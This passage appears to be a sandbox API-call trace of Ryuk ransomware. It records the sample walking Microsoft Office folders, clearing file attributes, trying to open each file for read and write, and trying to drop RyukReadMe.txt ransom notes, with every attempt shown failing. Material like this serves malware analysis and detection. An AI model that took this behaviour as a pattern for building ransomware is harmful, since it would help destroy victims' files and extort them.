dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.466] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.466] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.467] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR8B.GIF", dwFileAttributes=0x80) returned 0 [0136.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR8B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir8b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.474] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.474] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.474] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.474] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.474] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR8F.GIF", dwFileAttributes=0x80) returned 0 [0136.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR8F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir8f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.474] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.475] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.475] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.475] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.475] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR9B.GIF", dwFileAttributes=0x80) returned 0 [0136.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR9B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir9b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.476] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.476] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.477] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.477] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR9F.GIF", dwFileAttributes=0x80) returned 0 [0136.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR9F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir9f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.478] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.478] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.478] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.478] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.479] SetLastError (dwErrCode=0x0) [0136.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.482] GetLastError () returned 0x5 [0136.482] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.482] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.482] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.482] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.482] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.482] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.483] SetLastError (dwErrCode=0x0) [0136.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.483] GetLastError () returned 0x5 [0136.483] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.483] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.483] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.485] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.485] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.485] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.486] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Classic.dotx", dwFileAttributes=0x80) returned 0 [0136.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Classic.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\classic.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.486] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.486] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.486] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.486] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.487] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Default.dotx", dwFileAttributes=0x80) returned 0 [0136.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Default.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\default.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.487] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.487] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.487] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.487] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.487] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\DefaultBlackAndWhite.dotx", dwFileAttributes=0x80) returned 0 [0136.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\DefaultBlackAndWhite.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\defaultblackandwhite.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.488] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.488] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.489] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.489] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.489] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Distinctive.dotx", dwFileAttributes=0x80) returned 0 [0136.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Distinctive.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\distinctive.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.489] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.489] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.489] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.489] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.490] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Elegant.dotx", dwFileAttributes=0x80) returned 0 [0136.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Elegant.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\elegant.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.490] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.490] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.490] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.490] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.491] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Fancy.dotx", dwFileAttributes=0x80) returned 0 [0136.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Fancy.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\fancy.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.491] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.491] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.491] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.491] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.492] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Formal.dotx", dwFileAttributes=0x80) returned 0 [0136.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Formal.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\formal.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.492] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.492] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.492] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.492] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.492] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Manuscript.dotx", dwFileAttributes=0x80) returned 0 [0136.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Manuscript.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\manuscript.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.493] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.493] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.493] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.493] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.493] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Modern.dotx", dwFileAttributes=0x80) returned 0 [0136.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Modern.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\modern.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.494] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.494] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.494] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.494] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.494] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Newsprint.dotx", dwFileAttributes=0x80) returned 0 [0136.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Newsprint.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\newsprint.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.495] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.495] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.495] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.495] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.495] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Perspective.dotx", dwFileAttributes=0x80) returned 0 [0136.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Perspective.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\perspective.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.496] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.496] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.496] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.496] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.496] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Simple.dotx", dwFileAttributes=0x80) returned 0 [0136.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Simple.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\simple.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.496] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.496] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.496] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.496] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.496] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Thatch.dotx", dwFileAttributes=0x80) returned 0 [0136.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Thatch.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\thatch.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.497] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.497] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.497] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.497] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.497] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Traditional.dotx", dwFileAttributes=0x80) returned 0 [0136.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Traditional.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\traditional.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.497] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.497] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.497] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.497] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.498] SetLastError (dwErrCode=0x0) [0136.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.501] GetLastError () returned 0x5 [0136.501] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.501] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.501] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.501] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.501] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ReviewRouting_Init.xsn", dwFileAttributes=0x80) returned 0 [0136.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ReviewRouting_Init.xsn" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\reviewrouting_init.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.501] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.501] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.501] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.501] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.502] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ReviewRouting_Review.xsn", dwFileAttributes=0x80) returned 0 [0136.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ReviewRouting_Review.xsn" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\reviewrouting_review.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.502] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.502] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.502] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.502] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.502] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ROSE.CSS", dwFileAttributes=0x80) returned 0 [0136.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ROSE.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\rose.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.503] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.503] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.503] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.503] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.503] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\RPLBRF35.CHM", dwFileAttributes=0x80) returned 0 [0136.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\RPLBRF35.CHM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\rplbrf35.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.504] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.504] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.504] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.504] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.504] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL", dwFileAttributes=0x80) returned 0 [0136.504] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\savasweb.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.505] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.505] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.505] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.505] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.505] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS", dwFileAttributes=0x80) returned 0 [0136.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.506] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.506] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.506] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.506] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.506] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.506] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.506] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.506] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.506] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT" 